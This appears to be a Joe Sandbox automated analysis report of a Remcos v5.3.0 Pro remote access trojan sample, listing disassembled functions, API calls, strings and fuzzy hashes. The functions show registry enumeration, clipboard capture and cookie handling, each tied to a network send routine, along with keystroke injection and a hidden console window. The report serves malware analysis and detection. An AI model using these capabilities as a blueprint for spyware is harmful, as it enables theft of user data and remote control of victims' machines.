                              • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                              • Opcode Fuzzy Hash: a14ce8dca8c50f9d7d6b9dcd202626e44b251b874e1b71026016f31bc5760569
                              • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                              Function 00412C88 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnumInfoOpenQuerysend
                              • String ID: TUF$TUFTUF$>G$DG$DG
                              • API String ID: 3114080316-72097156
                              • Opcode ID: 3ad5bd36dfa565136e8aa744edffe012d565943c891bf2a6a09c828a98171038
                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                              • Opcode Fuzzy Hash: 3ad5bd36dfa565136e8aa744edffe012d565943c891bf2a6a09c828a98171038
                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                              Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                              • String ID: .part
                              • API String ID: 1303771098-3499674018
                              • Opcode ID: 9b955bb3b7786f571ce6ec872cb1de68ca0fa72ecc1e14eaff3f47b12c220e13
                              • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                              • Opcode Fuzzy Hash: 9b955bb3b7786f571ce6ec872cb1de68ca0fa72ecc1e14eaff3f47b12c220e13
                              • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                              Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                              • _wcslen.LIBCMT ref: 0041A8F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                              • API String ID: 3286818993-703403762
                              • Opcode ID: 0898a57a10710cf92ae4dfa81bccb6952f253845dccddd10a932c17125b7a1ed
                              • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                              • Opcode Fuzzy Hash: 0898a57a10710cf92ae4dfa81bccb6952f253845dccddd10a932c17125b7a1ed
                              • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                              Function 0040B6EA Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TUF
                              • API String ID: 1133728706-1738023494
                              • Opcode ID: 5049584b33ee49fad3daf964693ef0e5ef4d72208f5cfc6b374b1e65dfb7401f
                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                              • Opcode Fuzzy Hash: 5049584b33ee49fad3daf964693ef0e5ef4d72208f5cfc6b374b1e65dfb7401f
                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                              Function 0041BEB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                              Download Yara Rule
                              APIs
                              • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                              • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Console$Window$AllocOutputShow
                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                              • API String ID: 4067487056-2527699604
                              • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                              • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                              Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                              • __alloca_probe_16.LIBCMT ref: 004499E2
                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                              • __alloca_probe_16.LIBCMT ref: 00449AC7
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                              • __freea.LIBCMT ref: 00449B37
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • __freea.LIBCMT ref: 00449B40
                              • __freea.LIBCMT ref: 00449B65
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                              • String ID:
                              • API String ID: 3864826663-0
                              • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                              • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                              Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • SendInput.USER32 ref: 00418B08
                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                              • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InputSend$Virtual
                              • String ID:
                              • API String ID: 1167301434-0
                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                              • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                              • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                              Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                              Download Yara Rule
                              APIs
                              • OpenClipboard.USER32 ref: 00415A46
                              • EmptyClipboard.USER32 ref: 00415A54
                              • CloseClipboard.USER32 ref: 00415A5A
                              • OpenClipboard.USER32 ref: 00415A61
                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                              • CloseClipboard.USER32 ref: 00415A89
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                              • String ID:
                              • API String ID: 2172192267-0
                              • Opcode ID: b7aa8b19805f5f05fe72c04a212158e36f523d6116912796236e9c544eb290f4
                              • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                              • Opcode Fuzzy Hash: b7aa8b19805f5f05fe72c04a212158e36f523d6116912796236e9c544eb290f4
                              • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                              Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 00447EBC
                              • _free.LIBCMT ref: 00447EE0
                              • _free.LIBCMT ref: 00448067
                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                              • _free.LIBCMT ref: 00448233
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                              • String ID:
                              • API String ID: 314583886-0
                              • Opcode ID: b6bc52503377ed9d6f1f9e4f23e77935edc363574d887804d00f446c38a2ef84
                              • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                              • Opcode Fuzzy Hash: b6bc52503377ed9d6f1f9e4f23e77935edc363574d887804d00f446c38a2ef84
                              • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                              Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                              • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                              Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                              • _free.LIBCMT ref: 00444086
                              • _free.LIBCMT ref: 0044409D
                              • _free.LIBCMT ref: 004440BC
                              • _free.LIBCMT ref: 004440D7
                              • _free.LIBCMT ref: 004440EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$AllocateHeap
                              • String ID: J7D
                              • API String ID: 3033488037-1677391033
                              • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                              • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                              Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
                              • __fassign.LIBCMT ref: 0044A180
                              • __fassign.LIBCMT ref: 0044A19B
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                              • String ID:
                              • API String ID: 1324828854-0
                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                              Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID: HE$HE
                              • API String ID: 269201875-1978648262
                              • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                              • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                              Function 0040E6A3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
